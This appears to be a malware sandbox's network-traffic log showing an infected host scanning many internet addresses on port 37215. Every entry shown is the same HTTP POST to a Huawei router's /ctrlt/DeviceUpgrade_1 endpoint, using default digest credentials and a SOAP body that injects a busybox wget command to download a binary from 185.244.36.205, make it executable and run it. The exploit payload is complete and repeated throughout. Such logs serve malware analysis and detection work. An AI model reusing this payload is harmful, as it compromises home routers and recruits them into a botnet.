                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              597192.168.2.1557340186.246.234.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.222990990 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              598192.168.2.1552972167.197.232.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223012924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              599192.168.2.1536310138.45.149.22637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223016977 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              600192.168.2.1532912190.60.115.16937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223043919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              601192.168.2.1541694186.43.133.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223062038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              602192.168.2.1535360197.110.58.23337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223062038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              603192.168.2.1555134186.196.144.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223112106 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              604192.168.2.1536542122.213.111.2737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223113060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              605192.168.2.155061237.141.79.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223218918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              606192.168.2.1549694197.238.84.23437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223267078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
